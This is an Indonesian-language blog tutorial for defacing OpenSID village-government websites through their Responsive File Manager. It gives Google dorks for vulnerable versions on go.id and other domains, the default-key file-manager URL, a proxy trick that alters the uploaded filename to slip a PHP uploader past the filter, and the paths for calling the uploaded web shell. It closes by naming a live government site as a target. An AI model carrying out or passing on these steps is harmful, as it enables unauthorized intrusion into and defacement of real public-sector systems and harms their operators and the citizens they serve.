Deface poc RFM SID


Ok guys kali ini kita akan berbagi sedikiy ilmu deface kami yaitu rfm sid 

RFM adalah Responsive file manager Yaitu dia tempat penyimpanan / upload file.
Kebanyakan buf rfm sendiri di pragunakan oleh hecker hecker kontol langsung ajah kita buat tutorial nya.

Bahan / persiapan untuk deface 
-shell (gak punya shell download disini)
-exploit
-uploadshell (Upload Disini)
-sc depes kalean
-lightweb (download disini)
-SandroProxy (download disini)

Ok pertama kita dork dulu dork fresh yg saga kali tinggal kompas ajg

OpenSid 18.01-pasca  OpenSid 18.06-pasca 
OpenSid 18.02-pasca  OpenSid 18.07-pasca
OpenSid 18.03-pasca  OpenSid 18.08-pasca
OpenSid 18.04-pasca  OpenSid 18.09-pasca
OpenSid 19.00-pasca  OpenSid 19.01-pasca
OpenSid 18.05-pasca  OpenSid 19.01-pasca

OpenSid 20.00-pasca 0 itu lu ganti ajah 123456789 se tolol otak lu mikir kaga

OpenSid 18.00-pasca site:go.id
OpenSid 19.00-pasca site:go.id
OpenSid 20.00-pasca site:go.id
OpenSid 18.00-pasca site:go.id
OpenSid 18.00-pasca site:desa.com
OpenSid 18.00-pasca site:com
OpenSid 18.00-pasca site:net
OpenSid 18.00-pasca site:org
OpenSid 18.00-pasca site:id
OpenSid 18.00-pasca site:co.id
OpenSid 18.00-pasca site:xyz

Exploit:/assets/filemanager/dialog.php?akey=GantiKunciDesa

Jika kalean sudah ngedork langsung ajah masukin exploit nya 

Jika sudah langsung kita tebas ajah kalean akan masuk kedalam RFM(RESPONSIVE FILE MANAGER)


Jika sudah kalean pencet strip segitiga kalean upload file upload nya dulu

         -Tutorial Temper data img



Jika sudah di upload alhasil kaya gono kawan jika ada tanda x brarti gagal upload
Jika sudah kalean langsung ajah ke sandproxy nya untuk temper


Jika sudadh cari ajah filename dan tambahin <? Di depan .php<?.txt pencet segitiga

Tinggal panggil upload nya

/desa/upload/media/namauploader.php

Jika sudah kalean akan kluar uploader dah langsung ajah kalian upload shell kalean jika sudah kalian langsung ajah akses web nya dengan shell kalean panggil nya

/desa/upload/media/namashell.php

Live target :http://rasabou-bolo.bimakab.go.id/

Komentar

Postingan populer dari blog ini